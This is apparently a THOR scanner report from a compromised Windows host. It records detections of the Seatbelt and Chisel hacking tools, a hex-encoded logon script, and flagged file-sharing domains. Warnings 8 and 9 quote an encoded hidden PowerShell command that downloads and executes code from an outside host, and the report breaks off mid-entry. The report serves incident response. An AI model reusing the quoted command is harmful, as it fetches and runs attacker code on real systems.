Errors

Alerts

Alert 1
Sep 10 12:36:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
94
FILE:
E:\Windows\SysWOW64\Seatbelt.exe
EXT:
.exe
TYPE:
EXE
SIZE:
615936
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Sep 3 09:22:55.814 2024
MODIFIED:
Tue Sep 3 09:22:55.814 2024
ACCESSED:
Tue Sep 3 13:11:26.148 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
DESC:
Seatbelt
LEGAL_COPYRIGHT:
Copyright © 2018
PRODUCT:
Seatbelt
ORIGINAL_NAME:
Seatbelt.exe
INTERNAL_NAME:
Seatbelt.exe
IMPHASH:
f34d5f2d4577ed6d9ceec516c1f5a744
REASON_1:
YARA rule HKTL_SeatBelt_ASCII_Art_Feb22_1 / Detects Seatbelt tool on disk or loaded into memory based on a very specific ASCII art image
SUBSCORE_1:
85
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-26
TAGS_1:
HKTL
RULENAME_1: HKTL_SeatBelt_ASCII_Art_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule HKTL_Seatbelt_Dec20_1 / Detects red team tools from FireEye's toolset
SUBSCORE_2:
75
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2020-12-09
TAGS_2:
EXE, HKTL
RULENAME_2: HKTL_Seatbelt_Dec20_1
AUTHOR_2:
Florian Roth
REASONS_COUNT:
7

Alert 2
Sep 10 12:36:46 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
90
FILE:
E:\Windows\SysWOW64\chisel.exe
EXT:
.exe
TYPE:
EXE
SIZE:
9006080
FIRSTBYTES:
4d5a90000300000004000000ffff00008b000000 / MZ
CREATED:
Tue Sep 3 09:36:06.796 2024
MODIFIED:
Tue Sep 3 09:36:06.796 2024
ACCESSED:
Tue Sep 3 13:11:25.414 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
IMPHASH:
4f2f006e2ecf7172ad368f8289dc96c1
REASON_1:
YARA rule HKTL_Chisel_Feb22_1 / Detects TCP/UDP tunneling tool Chisel often used by threat groups
SUBSCORE_1:
80
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-01
TAGS_1:
EXE, HKTL, T1071_004
RULENAME_1: HKTL_Chisel_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule HKTL_PUA_Chisel_TCP_Tunneling_Oct20_1 / Detects Chisel TCP Tunneling tool
SUBSCORE_2:
75
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2020-10-05
TAGS_2:
EXE, HKTL, T1071_004
RULENAME_2: HKTL_PUA_Chisel_TCP_Tunneling_Oct20_1
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3

Alert 3
Sep 10 12:37:45 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
85
FILE:
E:\Windows\SysWOW64\s.txt
EXT:
.txt
TYPE:
UNKNOWN
SIZE:
450544
FIRSTBYTES:
0a0a202020202020202020202020202020202020 /
CREATED:
Tue Sep 3 09:23:34.642 2024
MODIFIED:
Tue Sep 3 09:25:29.294 2024
ACCESSED:
Tue Sep 3 09:28:18.102 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule HKTL_SeatBelt_ASCII_Art_Feb22_1 / Detects Seatbelt tool on disk or loaded into memory based on a very specific ASCII art image
SUBSCORE_1:
85
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-26
TAGS_1:
HKTL
RULENAME_1: HKTL_SeatBelt_ASCII_Art_Feb22_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warnings

Warning 1
Sep 10 12:03:26 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
32 bit THOR was executed on 64 bit system. For improved results, use the 64 bit version of THOR.

Warning 2
Sep 10 12:03:26 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Startup
MESSAGE:
Signature file is older than 60 days. Run 'thor-util upgrade' to get new signatures.

Warning 3
Sep 10 12:14:04 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
76
FILE:
E:\Program Files\Microsoft\MsEdge\MicrosoftEdgeInstaller.vbs
EXT:
.vbs
TYPE:
UNKNOWN
SIZE:
4178
FIRSTBYTES:
64494d2056556a4656566463584470736457516a / dIM VUjFVVdcXDpsdWQj
CREATED:
Wed Aug 7 08:50:58.000 2024
MODIFIED:
Wed Aug 7 08:50:58.000 2024
ACCESSED:
Tue Sep 3 09:04:48.231 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule Casing_Anomaly_Split_1 / Detects suspicious casing of split statement
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2018-01-18
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059
RULENAME_1: Casing_Anomaly_Split_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule Casing_Anomaly_Execute / Detects suspicious casing of execute
SUBSCORE_2:
60
REF_2:
Internal Research - T2T
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2018-04-17
TAGS_2:
ANOMALY, CASING, SCRIPT, SUSP, T1027, T1059
RULENAME_2: Casing_Anomaly_Execute
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3

Warning 4
Sep 10 12:20:54 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Program Files (x86)\Xen PV Drivers\bin\uninstall.vbs
EXT:
.vbs
TYPE:
UNKNOWN
SIZE:
22629
FIRSTBYTES:
2727272727272727272727272727272727272727 / ''''''''''''''''''''
CREATED:
Thu Oct 20 13:10:58.000 2016
MODIFIED:
Thu Oct 20 13:10:58.000 2016
ACCESSED:
Tue Jul 23 12:54:33.068 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_Recon_Command_Combo_Jun21_1 / Detects suspicious combination of commands often used in Pentest reconnaissance script
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-06-22
TAGS_1:
ANOMALY, SCRIPT, SUSP, T1105, T1197
RULENAME_1: SUSP_Recon_Command_Combo_Jun21_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 5
Sep 10 12:21:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
82
FILE:
E:\ProgramData\Microsoft\GroupPolicy\Users\S-1-5-21-2213792943-3978625667-3641601853-1124\DataStore\0\SysVol\MercuryLark.corp\Policies\{0D3199A7-9F17-4413-8579-06CECEBB3E24}\User\Scripts\Logon\UpdatePersonalCert.ps1
EXT:
.ps1
TYPE:
UNKNOWN
SIZE:
24206121
FIRSTBYTES:
2320446566696e6520746865206865782d656e63 / # Define the hex-enc
CREATED:
Tue Sep 3 12:20:56.121 2024
MODIFIED:
Mon Sep 2 17:42:49.000 2024
ACCESSED:
Tue Sep 3 16:40:39.685 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
OWNER:
BUILTIN\Administrators
REASON_1:
YARA rule SUSP_Encoded_GetCurrentThreadId_FileOnly / Detects encoded keyword - GetCurrentThreadId
SUBSCORE_1:
70
REF_1:
Internal Research - Permutator
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-01-19
TAGS_1:
SCRIPT, SUSP, T1027
RULENAME_1: SUSP_Encoded_GetCurrentThreadId_FileOnly
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Encoded_GetProcAddress / Detects encoded keyword - GetProcAddress
SUBSCORE_2:
60
REF_2:
Internal Research - Permutator
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2019-03-03
TAGS_2:
FILE, SUSP, T1027
RULENAME_2: SUSP_Encoded_GetProcAddress
AUTHOR_2:
Florian Roth
REASONS_COUNT:
3

Warning 6
Sep 10 12:21:32 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24060.7-0\ProtectionManagement.dll
EXT:
.dll
TYPE:
EXE
SIZE:
808216
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Tue Jul 23 02:59:07.744 2024
MODIFIED:
Tue Jul 23 02:59:02.094 2024
ACCESSED:
Tue Jul 23 02:59:09.182 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:C / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F / NT SERVICE\TrustedInstaller:F
OWNER:
NT AUTHORITY\SYSTEM
COMPANY:
Microsoft Corporation
DESC:
Protection Management WMIv2 Provider
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
ProtectionManagement.dll.mui
INTERNAL_NAME:
ProtectionManagement
IMPHASH:
12ecfd005b591254748953a418743600
REASON_1:
YARA rule SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1 / Detects PowerShell Cmdlet parameters to define Windows Defender exclusions
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-04-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 7
Sep 10 12:21:43 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24070.5-0\ProtectionManagement.dll
EXT:
.dll
TYPE:
EXE
SIZE:
808344
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Wed Aug 7 23:34:40.030 2024
MODIFIED:
Wed Aug 7 23:34:32.909 2024
ACCESSED:
Tue Sep 3 09:12:08.384 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:C / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F / NT SERVICE\TrustedInstaller:F
OWNER:
NT AUTHORITY\SYSTEM
COMPANY:
Microsoft Corporation
DESC:
Protection Management WMIv2 Provider
LEGAL_COPYRIGHT:
© Microsoft Corporation. All rights reserved.
PRODUCT:
Microsoft® Windows® Operating System
ORIGINAL_NAME:
ProtectionManagement.dll.mui
INTERNAL_NAME:
ProtectionManagement
IMPHASH:
12ecfd005b591254748953a418743600
REASON_1:
YARA rule SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1 / Detects PowerShell Cmdlet parameters to define Windows Defender exclusions
SUBSCORE_1:
65
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-04-29
TAGS_1:
SCRIPT, SUSP, T1059_001
RULENAME_1: SUSP_PS1_Cmdlet_Defender_Exclusion_Apr21_1
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1

Warning 8
Sep 10 12:21:55 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
2024-09-03T12:04:32.557 Engine:command line reported as lowfi: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe(powershell.exe powershell /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=)
SCORE:
88
FILE:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
LOG_MODIFIED:
Tue Sep 3 09:12:54 2024
LOG_ACCESSED:
Tue Sep 3 09:12:54 2024
LOG_CREATED:
Tue Jun 4 02:25:40 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
RULENAME_1: SUSP_PS1_Base64_Encoded_Pattern_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXISTS_1:
yes
TYPE_1:
EXE
SIZE_1:
431104
FIRSTBYTES_1:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED_1:
Sat Sep 15 07:14:15.943 2018
OWNER_1:
NT SERVICE\TrustedInstaller
COMPANY_1:
Microsoft Corporation
DESC_1:
Windows PowerShell
LEGAL_COPYRIGHT_1:
© Microsoft Corporation. All rights reserved.
PRODUCT_1:
Microsoft® Windows® Operating System
ORIGINAL_NAME_1:
PowerShell.EXE.MUI
INTERNAL_NAME_1:
POWERSHELL
IMPHASH_1:
d1a922c94a1f407cb2bbcad033c8ed7a
FILE_2:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
EXISTS_2:
yes
TYPE_2:
UTF16-Encoded File LE
SIZE_2:
25734294
FIRSTBYTES_2:
fffe0d000a002d002d002d002d002d002d002d00 / -------
CREATED_2:
Tue Jun 4 02:25:40.385 2024
OWNER_2:
NT AUTHORITY\SYSTEM

Warning 9
Sep 10 12:21:55 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
2024-09-03T12:04:35.558 Engine:command line reported as lowfi: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe(C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /w 1 /nop -encodedcommand aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBrAHkAcABlAC0AbQBlAGUAdAAuAGMAbwBtAC8AZgBhAHYAaQBjAG8AbgAuAGkAYwBvACIAKQA=)
SCORE:
88
FILE:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
LOG_MODIFIED:
Tue Sep 3 09:12:54 2024
LOG_ACCESSED:
Tue Sep 3 09:12:54 2024
LOG_CREATED:
Tue Jun 4 02:25:40 2024
REASON_1:
YARA rule SUSP_PS1_Base64_Encoded_Pattern_Feb22_1 / Detects suspicious encoded PowerShell code pattern often found in malicious samples
SUBSCORE_1:
75
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2022-02-28
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
RULENAME_1: SUSP_PS1_Base64_Encoded_Pattern_Feb22_1
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_2:
70
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2021-07-19
TAGS_2:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_2:
Florian Roth
REASONS_COUNT:
4
FILE_1:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXISTS_1:
yes
TYPE_1:
EXE
SIZE_1:
431104
FIRSTBYTES_1:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED_1:
Sat Sep 15 07:14:15.943 2018
OWNER_1:
NT SERVICE\TrustedInstaller
COMPANY_1:
Microsoft Corporation
DESC_1:
Windows PowerShell
LEGAL_COPYRIGHT_1:
© Microsoft Corporation. All rights reserved.
PRODUCT_1:
Microsoft® Windows® Operating System
ORIGINAL_NAME_1:
PowerShell.EXE.MUI
INTERNAL_NAME_1:
POWERSHELL
IMPHASH_1:
d1a922c94a1f407cb2bbcad033c8ed7a
FILE_2:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
EXISTS_2:
yes
TYPE_2:
UTF16-Encoded File LE
SIZE_2:
25734294
FIRSTBYTES_2:
fffe0d000a002d002d002d002d002d002d002d00 / -------
CREATED_2:
Tue Jun 4 02:25:40.385 2024
OWNER_2:
NT AUTHORITY\SYSTEM

Warning 10
Sep 10 12:22:20 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Malware file found
SCORE:
86
FILE:
E:\ProgramData\Microsoft\Windows Defender\Support\MPLog-20240603-192540.log
EXT:
.log
TYPE:
UTF16-Encoded File LE
SIZE:
25734294
FIRSTBYTES:
fffe0d000a002d002d002d002d002d002d002d00 / -------
CREATED:
Tue Jun 4 02:25:40.385 2024
MODIFIED:
Tue Sep 3 09:12:54.549 2024
ACCESSED:
Tue Sep 3 09:12:54.549 2024
PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F / NT SERVICE\TrustedInstaller:F
OWNER:
NT AUTHORITY\SYSTEM
REASON_1:
YARA rule SUSP_PS1_IEX_Download_Base64_Indicator_Jul21_1 / Detects suspicious IEX download action in base64 encoded form
SUBSCORE_1:
70
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2021-07-19
TAGS_1:
SCRIPT, SUSP, T1059_001, T1132_001
AUTHOR_1:
Florian Roth
REASON_2:
YARA rule SUSP_Encoded_PS_DownloadString / Detects encoded keyword - .DownloadString(
SUBSCORE_2:
70
REF_2:
Internal Research - Permutator
SIGTYPE_2:
internal
SIGCLASS_2:
YARA Rule
MATCHED_2
RULEDATE_2:
2019-02-28
TAGS_2:
FILE, SCRIPT, SUSP, T1027, T1059_001
RULENAME_2: SUSP_Encoded_PS_DownloadString
AUTHOR_2:
Florian Roth
REASONS_COUNT:
5

Warning 11
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"gofile.io": "{\"Tier1\": [6061, 5938], \"Tier2\": [5952, 7252, 5277, 7989]}",
SCORE:
70
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_gofile_io / Cloud file sharing https://twitter.com/BushidoToken/status/1691795030841680093?s=20
SUBSCORE_1:
70
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_gofile_io
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024

Warning 12
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"mega.nz": "{\"Tier1\": [6061, 5938, 8223], \"Tier2\": [7989, 236, 4915, 5277, 8223]}",
SCORE:
60
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_SUSP_Domain_File_Transfer_Service_Aug23 / Detects suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, SUSP, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024

Warning 13
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"pastebin.com": "{\"Tier1\": [6061], \"Tier2\": []}",
SCORE:
60
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_SUSP_Domain_File_Transfer_Service_Aug23 / Detects suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, SUSP, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024

Warning 14
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Suspicious Log Entry found
ENTRY:
"www.mediafire.com": "{\"Tier1\": [6061], \"Tier2\": [5952, 7989, 5277, 236, 4915, 4068]}",
SCORE:
60
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_SUSP_Domain_File_Transfer_Service_Aug23 / Detects suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, SUSP, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024

Warning 15
Sep 10 12:27:48 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal.tar\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:01:29.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1

Warning 16
Sep 10 12:27:48 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
65
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\utils_tests\traversal_archives\traversal_absolute.tar\tmp\evil.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Fri Jan 22 10:46:59.000 2021
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \evil.py
SUBSCORE_1:
65
REF_1:
Typical reverse shell names / suspicious file name
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1

Warning 17
Sep 10 12:28:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
70
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_utils_Ansible.Become\library\ansible_become_tests.ps1
EXT:
.ps1
TYPE:
Script
SIZE:
47988
FIRSTBYTES:
2321706f7765727368656c6c0a0a23416e736962 / #!powershell #Ansib
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
